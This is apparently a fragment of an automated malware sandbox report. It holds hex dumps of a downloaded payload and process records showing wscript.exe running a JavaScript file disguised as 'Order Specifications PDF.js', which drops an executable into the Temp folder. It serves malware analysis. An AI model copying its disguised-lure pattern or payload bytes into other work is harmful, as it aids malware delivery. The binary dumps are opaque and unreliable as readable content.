_t\|QDu%]i.lIcbY=_4}?/?CYdP!`UKx\|`"IT)~Yk]3 9]Fdw8wM3yr
2022-11-03 22:35:57 UTC	445	IN	Data Raw: bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e 36 9c 0f 80 15 e6 38 ba bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 Data Ascii: pnpnpnpnpnpnpn68pnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnp
2022-11-03 22:35:57 UTC	453	IN	Data Raw: 09 f0 6c 21 3a 2e 3c 98 79 2b 07 b1 d9 45 d7 f9 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e b1 a2 f1 3f 75 b4 92 f2 dc 05 5b 01 a4 5b 48 64 5c e6 c8 64 02 f5 d4 ef 41 c2 6f 69 43 57 32 a1 cc 43 2c 2a f7 e4 74 99 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 1d db 3c 28 a0 74 58 e8 79 2b 07 b1 d9 45 d7 f9 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e b1 a2 f1 3f 75 b4 92 f2 fa 52 30 12 69 3e 3f 20 68 ee a6 53 24 42 1f ae b5 28 c3 2f e7 75 c5 bd fd f8 72 3c fb 71 11 80 20 8c da 6e d3 4d 27 90 88 ee b9 f9 de e4 e7 ec 20 8c da 6e d3 4d 27 90 e3 f5 ba 82 d5 41 4d 15 e3 f5 ba 82 d5 41 4d 15 a4 25 2a a3 b1 88 ef Data Ascii: l!:.<y+Epnpnpn?u[[Hd\dAoiCW2C,t%0%0%0%0%0%0<(tXy+Epnpnpn?uR0i>? hS$B(/ur<q nM' nM'AMAM%
2022-11-03 22:35:57 UTC	461	IN	Data Raw: bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e 06 2c cc a7 6b 2e 02 30 59 ec 3b 69 78 35 cf e0 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 c4 b3 a9 60 9f 0b 9a 02 ee 74 1c 90 e6 62 01 1d ff e9 3f 01 bb 61 87 c3 ce 37 aa d7 16 83 76 97 bd 06 6b af fc d4 aa 0e ee 75 7d c1 bd fb 01 d1 df d9 9a d8 ac ff 0b 12 ff e0 a0 23 01 fa c7 9b 19 59 ad 27 96 18 4c 46 cb 44 e9 3e e6 d3 d0 62 a4 0b 16 3a 3f 88 1e e2 49 b7 26 83 6c c6 12 45 1f 3b c2 c7 aa 12 b8 ed a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 9e 48 9a de b5 cb 4c b1 67 ec 2a ee dd c8 af 20 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e 06 2c cc a7 6b 2e 02 30 59 ec 3b 69 78 35 cf e0 e9 3c df d1 00 38 3d 08 68 6d 13 ae 84 27 f9 3f 6b 33 83 5b a3 3c 1a 14 1e 03 79 1e 17 5e 4c Data Ascii: pnpn,k.0Y;ix5%0%0`tb?a7vku}#Y'LFD>b:?I&lE;%0%0HLg* pnpnpn,k.0Y;ix5<8=hm'?k3[<y^L
2022-11-03 22:35:57 UTC	469	IN	Data Raw: 9c 04 4c f5 2d da 5b 82 3c e2 cc ec e0 f2 c7 6f 1e 3f 42 5e 34 12 88 c4 3e 81 4e a9 63 51 99 17 7f 1d 2c 90 1f b5 cf 00 43 87 f0 64 d8 af 32 87 c4 3d 4b f5 77 92 c0 6b 8e ee a3 2d 33 00 0f ce a0 fb 0d 6d d7 18 00 98 e6 3d f4 86 1d b4 6e f5 45 6b 06 87 65 c3 37 a9 4e 92 63 f8 89 19 0e 34 a9 2f 58 3b 44 71 06 d0 3b 16 9e 54 b1 7a c4 3e a2 f9 62 59 70 46 5d 05 7d 9d 27 3c d0 f0 bf 58 1b ca e4 19 cb d5 61 cc 01 de 92 16 46 e6 39 96 87 34 df 16 3c 5b 3a 33 12 39 d3 2b b4 19 fe 10 eb 68 d0 54 43 12 05 ff 65 c3 8c f0 c9 1c 39 7a c5 4f f2 cd 2d e4 2a be 4e 12 05 18 44 c3 6f 2c 4b bd 96 ec 73 70 d3 b4 32 6e 12 68 d9 40 18 d6 52 41 1c 32 5b 5a fd 0b aa 5c 8c 2e f0 4e 1b 9b 93 5b dc 8d 6a 3c c0 75 22 46 72 34 c1 4e a2 9d 9b e7 b5 06 b8 aa 72 9f 01 0b 43 f7 25 b4 66 Data Ascii: L-[<o?B^4>NcQ,Cd2=Kwk-3m=nEke7Nc4/X;Dq;Tz>bYpF]}'<XaF94<[:39+hTCe9zO-*NDo,Ksp2nh@RA2[Z\.N[j<u"Fr4NrC%f
2022-11-03 22:35:57 UTC	477	IN	Data Raw: 27 6e a9 23 0c 7d 99 d6 7f 1d c8 c9 a1 51 ec 9b 60 87 0e f8 e6 1f af 70 a8 99 c1 19 11 b4 81 3d cc e8 0a 9d 81 ef c0 b3 2f e3 17 fa ff 94 2a 8a 2c c5 0b 4c 9e d0 99 17 6b 0e 59 eb fe 05 a4 4d ee 16 ae 44 43 57 dd 41 a2 f2 4b 8c 10 22 67 0b 27 9a e6 26 d2 2c c1 ed f9 0f 54 47 6f 49 26 56 2b 11 5b af 63 ed 3d ad a6 20 69 cb ab 58 c7 cb 98 e1 69 11 be 7d 8e 91 cb a6 b4 8a 0e 04 01 9a 9d 9f cd 28 cd aa 91 ce 2b 97 dd d8 60 ee 08 e3 c3 ec 6d e7 70 a3 a1 c4 58 54 cd a2 94 9f 22 d0 e5 1b f6 9d aa ef 87 0a 09 b1 ef 37 83 ac 80 40 fe b2 6c a5 77 c6 d0 74 2e 79 2b ec ae 76 c4 38 d7 26 b9 c6 b0 e9 52 75 bc b4 cc 16 ea c4 59 7a fd dd a5 63 cb 85 ab fa 74 b8 bc 60 52 07 a3 81 9b 7a 50 5c 78 8f 47 2c f4 0b 9f 00 4a c9 81 b7 87 e6 60 8f 38 dc 4e dc dd 00 a1 0e 25 c5 01 Data Ascii: 'n#}Q`p=/*,LkYMDCWAK"g'&,TGoI&V+[c= iXi}(+`mpXT"7@lwt.y+v8&RuYzct`RzP\xG,J`8N%
2022-11-03 22:35:57 UTC	484	IN	Data Raw: d2 b5 44 6b 1a a2 e6 46 07 62 74 ba c9 96 4a 53 5b 3b a7 3c d2 8b a1 5f 10 22 ae cc da a7 46 58 e0 be 1a 8e c4 be e6 7c 9a 47 e3 25 f6 f0 55 29 09 97 b1 67 43 f9 89 38 17 12 e9 b4 b5 12 9e 80 34 65 aa 80 57 49 6c 12 03 c3 34 b2 7e d9 09 b6 aa 82 64 bb a6 e6 ac a9 6f 7e a9 75 35 12 7e bb 21 c4 6f 25 8b 1e 2b ca d8 31 ba 33 18 bd 1d cd 39 c5 a6 c2 87 43 50 69 91 aa d7 c1 2e fa f4 26 3f 4e b9 b9 9b 84 b8 98 73 70 25 80 d5 26 71 7d 61 90 dc 94 4e 0a c1 15 d7 60 0c 14 68 c4 a9 85 ad c8 aa be e9 b6 e1 55 2c 6b 36 43 a3 7b 4e e2 ef 50 5f c2 7c c8 ba 64 54 e9 0e ae 5e ef 0f 36 02 a6 fd 3a 24 95 93 cf cb d5 69 a6 cc a0 73 55 b7 be b6 ef df 86 54 ab ae 80 bc 13 f7 ae e7 5e 88 4f 27 c9 36 65 0c 1b 31 29 e3 87 a1 c9 75 b2 3b 3a 6b 7a 91 0b ab 64 f3 dd 79 2e 12 ef 3f Data Ascii: DkFbtJS[;<_"FX\|G%U)gC84eWIl4~do~u5~!o%+139CPi.&?Nsp%&q}aN`hU,k6C{NP_\|dT^6:$isUT^O'6e1)u;:kzdy.?
2022-11-03 22:35:57 UTC	492	IN	Data Raw: 22 8b 59 f4 03 ca 69 e4 17 e1 45 e8 76 5f 04 5a 80 12 d7 33 16 00 64 d3 db b3 5c 75 64 4f 9f 2c de 4f d0 57 7f 46 2b a6 96 37 fe c5 17 47 b4 53 ab e3 c0 5d 14 ec 92 c4 5c 8b 58 de b4 c6 9b 1d 32 06 65 04 3f 76 a0 6b 0a 5d 8e a0 c7 69 f9 11 62 49 a2 16 11 06 c8 3b 11 10 4d ed 14 e8 aa 3b 13 ad 74 41 97 fe 5c 04 b1 a0 a6 36 df 66 ab 30 1c 8f 02 d8 10 91 1d b0 8f 38 4b fa 3b 27 7e 82 f0 33 0d 7e 5e 3d 25 e7 e5 bd a0 aa f6 38 37 80 99 c9 d8 40 ea 1f 49 1a b2 4b 54 01 a3 04 99 cc b9 77 3c 10 84 71 13 2a d6 07 50 62 54 90 5a 05 da ef a9 28 ce 97 07 01 5c b8 bd 93 17 6b 5b 19 4c 0c 4c 1d 07 f8 e2 5e ad 68 c0 86 5a 2c 45 4d 10 31 9f 73 5d c7 bc 93 7a 09 6b 7d 03 54 43 f7 0e 90 99 5d 83 25 f8 ef cc c6 05 00 6b 45 02 45 8d 3b 64 72 6d 85 ed 55 ef 71 8c 20 fb ad 9c Data Ascii: "YiEv_Z3d\udO,OWF+7GS]\X2e?vk]ibI;M;tA\6f08K;'~3~^=%87@IKTw<q*PbTZ(\k[LL^hZ,EM1s]zk}TC]%kEE;drmUq
2022-11-03 22:35:57 UTC	500	IN	Data Raw: a7 9f 8d 82 ff 4f 22 2a 33 ac 62 43 0a 4d a5 b0 5e e5 16 ba dc 8c a1 d4 12 63 f2 cf 56 14 3a 9d 05 96 a4 93 ad 00 c7 1b 30 90 cd 58 c3 f5 07 d0 cd 97 ae e0 f8 04 46 4c 7c d6 58 0d 44 08 fe 3b 5b 9c 1a 75 ed e2 46 10 37 b6 c3 24 01 cd 0b a5 60 d3 7b ee 8c 43 bf bb 64 14 5f 74 d2 06 62 e2 e7 41 87 84 44 28 64 17 b2 29 e1 cc 05 17 9c ea ed d7 61 19 65 0a f5 71 85 47 3a a3 04 40 33 16 ac 44 53 10 29 cb b1 3f 2f b7 8b fd dc 06 b7 23 ac aa b1 ca 3c 7b ab 52 c5 ca b4 c9 b3 37 0f 96 d3 fa c6 e5 80 5d 2e 95 f9 f8 5f 30 6e 62 9f db 8c 59 66 e9 3e b6 f4 09 9f 95 2a 4a 67 53 fd 3c 8f d8 e0 80 b2 b2 1c c7 70 16 1b a4 91 c5 7b a0 4c 6f c8 36 6b f0 d3 69 f2 fb 96 34 81 5f 41 f4 65 bb 98 b7 f3 e7 6c 51 76 f9 70 61 3c 38 f7 7b de 29 ac 21 5a a5 d1 81 d7 0b e4 16 b4 e9 eb Data Ascii: O"3bCM^cV:0XFL\|XD;[uF7$`{Cd_tbAD(d)aeqG:@3DS)?/#<{R7]._0nbYf>JgS<p{Lo6ki4_AelQvpa<8{)!Z
2022-11-03 22:35:57 UTC	508	IN	Data Raw: 13 da 74 fd 93 4e ad 7b 9c 73 b6 12 60 d0 c0 5c 2b e7 ff 3d 5f b9 51 09 19 30 90 90 d3 42 f6 03 cc fe 20 f3 05 dd 00 9d 14 9c 9c 37 18 ce 4f f2 30 e5 e1 28 1d 2a c0 88 e5 a4 d8 88 29 72 13 8b 4f a9 70 d8 34 39 d2 b0 b1 09 a1 36 9e 8f f9 32 5c 50 72 68 76 05 a1 68 5f 5e 2e b6 19 76 ae f6 d9 9c 5e 68 f0 41 31 0c e7 d8 c6 80 f5 91 36 60 7b 1e 5a 85 5b fa d4 c1 dc d6 9a 7f dc 04 cc c8 9c 15 b0 f6 05 cd 68 92 7e de be 10 b5 68 7b dc 84 4c dd 52 3a a6 c0 63 00 2b 9b 67 f0 e6 dd 03 69 f6 29 fd 90 0a b4 05 c1 81 63 0e f2 aa 54 32 b7 49 39 6c 85 8c 8a fc a0 5c 13 7d eb fc 49 38 15 a6 6a 35 8d 55 39 1a 97 63 4b 47 e0 9e 8f f8 79 99 4c af ca 66 de 1f cf ba dc d9 76 39 73 6d 6b 9e 9e f5 e5 41 31 97 f6 8a 38 3d 58 be e3 62 b6 24 e6 b0 70 53 92 70 0c 50 47 00 61 b5 fc Data Ascii: tN{s`\+=_Q0B 7O0(*)rOp4962\Prhvh_^.v^hA16`{Z[h~h{LR:c+gi)cT2I9l\}I8j5U9cKGyLfv9smkA18=Xb$pSpPGa
2022-11-03 22:35:57 UTC	516	IN	Data Raw: c6 89 a4 13 42 4d cf 76 6d b3 d3 0d 47 2e 50 84 76 46 f3 d8 04 59 ef d4 cd 91 a1 6d ea 49 d6 f6 20 fa bb 7a c2 da 97 20 79 7d 82 51 af 3b 62 9e c1 9c 61 a8 50 dd b3 42 ae dc 3a 4d 35 04 f1 33 a7 ee 83 8f ba 17 01 e0 96 6c 65 46 95 3c 79 db 52 c5 38 3b a7 67 dc f8 b9 ae 4d 02 04 93 1e 16 20 25 36 ff 24 b7 7c f4 ca 3b 8c 0a 78 fa bd 69 a1 24 4f 20 7f 98 a5 af 32 15 6e df 11 c6 cf d1 21 c8 7b 67 1a 75 02 3c ff 2a 17 85 16 fe dd 34 f1 2b bc 18 d8 ff 3f 54 e4 a9 a7 86 1c ca be 1b c6 46 a9 2d 17 b8 1f 39 12 3c 87 82 10 f8 ae 84 13 19 a5 14 71 6d ba f9 07 fe 79 36 67 de 54 47 60 e2 a2 17 8a 88 41 0b 8e ba 8f 68 78 8a 7e 49 fa 9d 7b ed ee 0a b4 05 c1 81 63 0e f2 75 db 74 39 9b 6d 8b 26 57 38 aa e9 77 72 bf fd 06 cc 6c 1b 6a 58 e8 44 80 b0 ed 52 e2 32 bd a1 ea 24 Data Ascii: BMvmG.PvFYmI z y}Q;baPB:M53leF<yR8;gM %6$\|;xi$O 2n!{gu<*4+?TF-9<qmy6gTG`Ahx~I{cut9m&W8wrljXDR2$
2022-11-03 22:35:57 UTC	523	IN	Data Raw: 00 21 ea 2b a9 c4 bc 83 13 d8 f7 e6 bd 1e 7e b3 48 77 6c 9a cb 5e 71 77 ba 4e ec 48 a5 b8 76 20 ef c7 9b 8d 9b 7c b6 41 56 07 36 84 6d 00 ce 27 ee ba cf 03 91 49 57 10 65 db 43 37 5f 7c b6 41 56 07 36 84 6d de d5 61 3b 78 46 27 bb 20 84 fb fa a4 dc 97 55 c2 34 43 fd c4 a8 4c 4d 9f 5e 77 ee 4f 6a a1 ee f5 06 90 6f 94 7c bc 21 7c b6 41 56 07 36 84 6d 59 0d c9 3a 6c 68 83 18 19 9f 44 c0 aa 26 4f 8a c2 34 43 fd c4 a8 4c 4d f2 f7 84 51 04 33 ed 30 53 d2 71 a9 07 95 f5 08 c2 34 43 fd c4 a8 4c 4d 83 4a 46 bc d3 66 57 a7 32 de eb fe 77 05 9b 6e 20 94 4a ee a8 38 9b 27 4d 28 12 91 2c ee 83 55 fc c5 1f 0f e7 98 31 41 00 46 94 a8 91 a0 ca d2 06 00 35 40 ba 21 0c c5 ba aa 69 0b 9e 2c 96 5e c2 34 43 fd c4 a8 4c 4d 72 dc bb 03 88 13 d2 e7 c1 f1 2c b3 3f 90 de 03 ea d5 Data Ascii: !+~Hwl^qwNHv \|AV6m'IWeC7_\|AV6ma;xF' U4CLM^wOjo\|!\|AV6mY:lhD&O4CLMQ30Sq4CLMJFfW2wn J8'M(,U1AF5@!i,^4CLMr,?
2022-11-03 22:35:57 UTC	531	IN	Data Raw: a8 4d f5 4f 93 25 81 4f 32 86 a4 de 88 d3 f3 7b f5 f8 a2 56 0c 29 cb b4 63 41 9d 91 95 d1 99 a8 d9 a9 94 79 0c 4c 2b 6a 42 48 44 a9 07 28 2c c0 dd 51 00 1b 72 4b 2d a0 0c d7 f6 68 b4 4f 51 7f 4e a6 2a 5a 16 04 d0 be d7 19 f0 23 a6 c7 17 9b 6c d5 32 42 f2 7e aa 30 4a 88 5d 09 a9 eb 63 8b ae 36 18 b0 09 dd ca f2 0d 46 79 18 f9 5d 21 57 64 97 bb 0e 8c 04 4d a9 8a 47 99 2b cb b8 e0 20 fb 60 f4 81 af 50 30 f8 72 66 31 c3 4b 67 3b 84 5f 71 5b c8 42 6c 5a 1b 43 0b f8 e0 4a 4f 24 a8 0e a4 73 9d 15 00 5c e9 b4 51 5f 9c a7 4f ca d2 08 66 99 f3 25 90 ad e5 e9 be ec 48 cb 36 1f ad 65 b7 55 84 59 fd 40 c4 da 92 d6 69 f7 62 1e dc 7b a1 b4 d4 a4 76 84 a0 82 4a 2f f9 28 df 67 e3 c7 1a c4 e4 08 fb 01 e8 52 b7 5c 88 e3 04 4f 18 eb 20 ba 29 dd e0 ae 6a 5c dc 0c 5a 7d 23 8f Data Ascii: MO%O2{V)cAyL+jBHD(,QrK-hOQN*Z#l2B~0J]c6Fy]!WdMG+ `P0rf1Kg;_q[BlZCJO$s\Q_Of%H6eUY@ib{vJ/(gR\O )j\Z}#
2022-11-03 22:35:57 UTC	539	IN	Data Raw: 2e ec 59 56 b6 d4 e7 9f 79 24 d7 1f 9d a1 7c cd a6 3e 6a 7c 27 fc cc 7c 71 28 ea 40 e4 79 19 1d f5 c9 01 b0 69 94 08 14 a7 c3 5f 3f a7 18 90 43 23 c5 66 b5 1e cc 2c 90 b2 42 97 62 ec c1 cd b9 a8 8d df 43 f5 96 45 60 c9 b2 3f 23 23 79 bb 7b 4f 76 0d 0f 99 f0 39 02 8f 93 38 3a dd 58 1d 90 46 3a 02 ad 9a 72 13 2b bb 98 db cc 5d 54 f2 96 d9 4a 50 6e ec 25 2c 95 f8 4e 02 1f c3 03 1e 13 99 c7 12 dd 0f 41 3c 85 18 c3 86 f2 61 02 c6 a3 de b8 8d 38 05 d4 1c c0 2f bd be 8e c1 24 1e 57 df 44 fb 7d 63 d6 16 ad 9e 1a 85 95 3e 84 de 41 4c b2 2b 37 e5 e4 be 20 96 65 0f f0 38 ae 6b 8b ac 21 86 43 6f 2c 21 a8 e7 3d 0e 4d 6f 77 e9 a0 2f 5b 06 50 82 53 c7 89 71 87 3f 13 15 17 40 88 e5 f1 84 a3 c9 e9 73 f7 4f 4a 3a 06 c6 93 e2 0b 10 8d 6e a9 54 ed 84 d9 39 40 a2 41 e6 64 6e Data Ascii: .YVy$\|>j\|'\|q(@yi_?C#f,BbCE`?##y{Ov98:XF:r+]TJPn%,NA<a8/$WD}c>AL+7 e8k!Co,!=Mow/[PSq?@sOJ:nT9@Adn
2022-11-03 22:35:57 UTC	547	IN	Data Raw: fc c7 9f 8e 1a f3 5b 12 31 63 28 75 cd 8c 58 fd ac 50 de 9e 9e 84 66 ef 9c 32 08 38 f6 e6 1e 7e 23 1b 3c 2d 38 2e b9 5e 2f ab 4e 53 bc 33 d6 b5 f4 99 20 eb fd d6 32 98 b8 14 24 c3 29 dc 4b 4d b3 ba ab 86 0f 25 1d d2 92 ee a5 b9 96 2e 2c 6c c9 7a 0d d3 1c 2d 32 44 b5 e0 15 c5 5c 79 d3 2c 55 5e d7 81 74 64 b5 71 43 2b a9 e9 09 e6 c3 af 21 ec 9c 86 fa 2e fb e0 19 0d 86 06 2b 8c 3a 3c d3 ec 94 05 df af 68 2f 24 f1 93 dc da 98 f1 4c 41 84 42 fd 82 9c 48 22 e4 53 6c be e2 8e ca e9 f4 9a 8d ac 3d 25 12 fb 09 f6 39 5c c7 d5 53 ce 82 95 38 f2 24 8e 4c cd 79 13 7f af 76 70 f3 8f 1e b1 fe 01 f5 13 15 63 67 57 4f 7c b5 4b 7b b5 cc a6 b5 65 79 6e d9 e6 2b 9f 97 89 2c 9a d9 be e5 a0 18 5d 06 f5 cc 98 7e 06 02 5e 84 c3 c2 9d ab 92 ce 91 8e 49 8b a0 3c 7e 3c f2 fd 3e 6b Data Ascii: [1c(uXPf28~#<-8.^/NS3 2$)KM%.,lz-2D\y,U^tdqC+!.+:<h/$LABH"Sl=%9\S8$LyvpcgWO\|K{eyn+,]~^I<~<>k
2022-11-03 22:35:57 UTC	555	IN	Data Raw: 3b c2 7e e8 f0 90 82 fe c8 41 30 24 a3 bd 05 77 c9 4a 15 48 6b 27 62 c4 b0 c2 97 cf 86 2d 76 9f db 0d 15 d3 bf 32 da 32 fe 13 4e 6e 31 84 58 e0 15 c1 aa 4c cf fc 73 6a 13 4a 20 46 8d d0 84 ec 4b 77 c3 ac 5b 6e 07 eb b9 5b a2 50 55 48 9a a9 40 74 75 ed 1a d3 44 6c 5f 32 5f c0 4e 8a 15 0c 1f a0 6e c7 ff ee c1 99 3b 36 70 07 78 e7 c2 6e 14 8f e6 20 9c 70 6b f2 99 f8 0d cd da e9 dd fb 08 5b 77 0a 6c 2c fc 7e f5 fb 69 98 47 09 e3 9c 22 ba 06 9f 96 c5 51 fa 9f 5b 8e a1 f4 d3 f3 05 9a a8 53 d5 3f a8 30 b3 a1 9c ad dd 0e 02 ab e2 91 f3 df 01 3a 15 c5 1e 8d 10 79 7f e0 e9 dd fb 08 5b 77 0a 6c e9 dd fb 08 5b 77 0a 6c fc e5 7a b3 e0 5b 8e 55 d8 6f fb 77 11 d8 c8 0c 5b f4 8c 0e 12 ab 2c 55 e9 dd fb 08 5b 77 0a 6c e9 dd fb 08 5b 77 0a 6c e9 dd fb 08 5b 77 0a 6c e9 dd Data Ascii: ;~A0$wJHk'b-v22Nn1XLsjJ FKw[n[PUH@tuDl_2_Nn;6pxn pk[wl,~iG"Q[S?0:y[wl[wlz[Uow[,U[wl[wl[wl
2022-11-03 22:35:57 UTC	563	IN	Data Raw: a3 76 d8 8b 11 64 c0 43 60 e4 b3 b7 85 64 f9 7c 33 3f ee b3 f4 1f e2 a2 86 af 8e cd 74 46 7e 6f 4d 43 35 71 70 92 bc 55 12 d6 01 f6 e9 25 99 67 7c db d8 a7 77 a4 e7 49 0a ec 86 d7 c4 a8 34 c3 3e b1 a3 6f ca 35 45 a3 16 2d f5 ff a3 2c 13 5f 74 fa 6f c6 32 79 c4 10 5a d9 ac e3 12 ca 71 15 05 a2 4f 20 88 6a e6 72 d1 8c ff 97 44 f2 81 38 a1 07 df 7f 9d 8d 46 08 6c 3a 48 b1 6c a6 6a 53 d7 95 0f f5 62 7b 33 20 59 88 49 1e b8 c0 e1 1f 88 4e 56 0a 43 fa 48 a7 e2 89 34 6f 3a 42 d1 90 17 88 be f9 2c 21 ee a1 89 59 54 8e 81 b4 97 4c a2 5d 8e 8d dc c8 9b d6 3a 26 7a 49 ff fd 05 ff b2 5f f1 61 38 ca 16 e6 f6 bb c9 0f 43 55 0f 95 d6 7c 02 ba 8f 80 c2 03 0c 35 95 f5 95 5d e8 58 be 2f 18 69 44 3c 14 2c 94 5f cc 50 70 cc 11 27 7f bf d9 2f 0b 87 2a 47 a9 9d bf 5a f2 0c 63 Data Ascii: vdC`d\|3?tF~oMC5qpU%g\|wI4>o5E-,_to2yZqO jrD8Fl:HljSb{3 YINVCH4o:B,!YTL]:&zI_a8CU\|5]X/iD<,_Pp'/*GZc
2022-11-03 22:35:57 UTC	570	IN	Data Raw: 06 fe 08 01 01 07 01 59 28 01 00 01 01 09 01 66 28 01 00 01 01 0b 01 72 28 01 00 01 01 0d 01 7e 28 01 00 46 01 0f 01 92 28 01 00 03 01 11 01 9e 28 01 00 03 01 13 01 9e 28 01 00 03 01 15 01 9e 28 01 00 03 01 17 01 9e 28 01 00 03 01 19 01 9e 28 01 00 03 01 1b 01 9e 28 01 00 06 01 1f 01 ad 28 02 00 04 80 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 1f 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 0a 00 28 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 3e 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 45 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 0a 00 5a 00 00 00 00 00 00 00 00 00 01 00 00 00 81 00 00 00 14 9b 08 00 01 00 00 00 a2 00 00 00 07 00 06 00 08 00 06 00 09 00 Data Ascii: Y(f(r(~(F(((((((((>EZ
2022-11-03 22:35:57 UTC	578	IN	Data Raw: 31 31 37 39 31 37 35 66 63 35 64 61 35 61 63 00 63 38 63 61 62 33 35 63 33 62 33 31 61 31 30 33 30 36 63 61 64 37 63 30 36 36 39 65 62 33 39 37 66 00 63 39 66 33 31 37 63 64 66 34 62 34 64 30 35 32 30 66 30 64 66 61 33 31 33 61 33 36 31 62 63 33 31 00 63 39 31 31 63 32 33 31 31 33 61 31 37 34 36 37 35 66 61 65 31 36 36 39 65 39 39 64 30 37 39 62 35 00 63 37 65 34 63 66 64 34 63 39 65 31 34 32 63 66 33 32 65 39 65 62 65 35 63 32 30 64 35 32 38 65 37 00 63 31 65 65 31 33 66 39 65 64 63 65 61 36 33 39 30 63 37 33 62 62 63 65 66 35 37 32 31 66 36 66 33 00 63 39 62 30 36 64 62 31 37 30 38 38 34 62 30 36 31 33 34 32 63 34 31 36 35 34 65 32 33 34 30 66 36 00 63 62 33 62 63 35 30 38 36 31 63 64 35 65 66 37 39 31 32 32 39 32 32 63 62 30 34 31 61 30 38 33 62 00 63 Data Ascii: 1179175fc5da5acc8cab35c3b31a10306cad7c0669eb397fc9f317cdf4b4d0520f0dfa313a361bc31c911c23113a174675fae1669e99d079b5c7e4cfd4c9e142cf32e9ebe5c20d528e7c1ee13f9edcea6390c73bbcef5721f6f3c9b06db170884b061342c41654e2340f6cb3bc50861cd5ef79122922cb041a083bc
2022-11-03 22:35:57 UTC	586	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-11-03 22:35:57 UTC	594	IN	Data Raw: 01 43 7f 73 5a 28 9f 24 7c a0 35 40 06 fa 94 af 0a a1 83 b6 13 e4 4b 15 06 5e 6a 8a 20 34 71 7b bb 25 ad 3f 5b 0a a4 1f 2f 6c 7d 2e 61 51 d0 8c 59 37 3e a6 5d f1 1e 5d 80 b6 d8 1f 60 e3 cd 12 6a 88 1f c6 fe 18 cb 93 43 56 7a c7 ce 03 d6 00 64 28 56 22 b1 4b 19 d2 f0 96 c9 44 1f 39 5d 9c b0 96 ed 5a 49 8d 7e 72 e4 43 6b 7f c9 a0 3f 6c 4a ad d5 00 4f bd 0a b8 83 c5 bd 98 2c 07 76 01 70 45 de c3 f0 42 69 ea ff 26 cc 03 44 1f 16 28 e1 6a 74 b6 9c 45 fa b6 3a ce 94 d1 1f bd 8c 65 aa fd fc c3 3c e8 0d 9c 38 66 d5 fc 7d 1e 9b 59 8c 91 5a 42 57 55 50 16 0d 4b 74 72 ee a0 2a 31 fc 26 02 34 f9 64 1b 59 fd e3 3a d4 e8 b8 41 29 74 01 3f 0d e0 13 77 2b 11 3c fb 3d cd d0 e7 e1 97 5b 55 f7 2a 03 6d d5 cd 62 da ce 9c 1e fc ea 70 7d e6 7d 4b 68 ce 5a 29 61 d3 a0 5c 25 b3 Data Ascii: CsZ($\|5@K^j 4q{%?[/l}.aQY7>]]`jCVzd(V"KD9]ZI~rCk?lJO,vpEBi&D(jtE:e<8f}YZBWUPKtr1&4dY:A)t?w+<=[Umbp}}KhZ)a\%

Target ID:	0
Start time:	23:34:58
Start date:	03/11/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Specifications PDF.js"
Imagebase:	0x7ff742790000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	10
Start time:	23:35:59
Start date:	03/11/2022
Path:	C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe
Wow64 process (32bit):	true
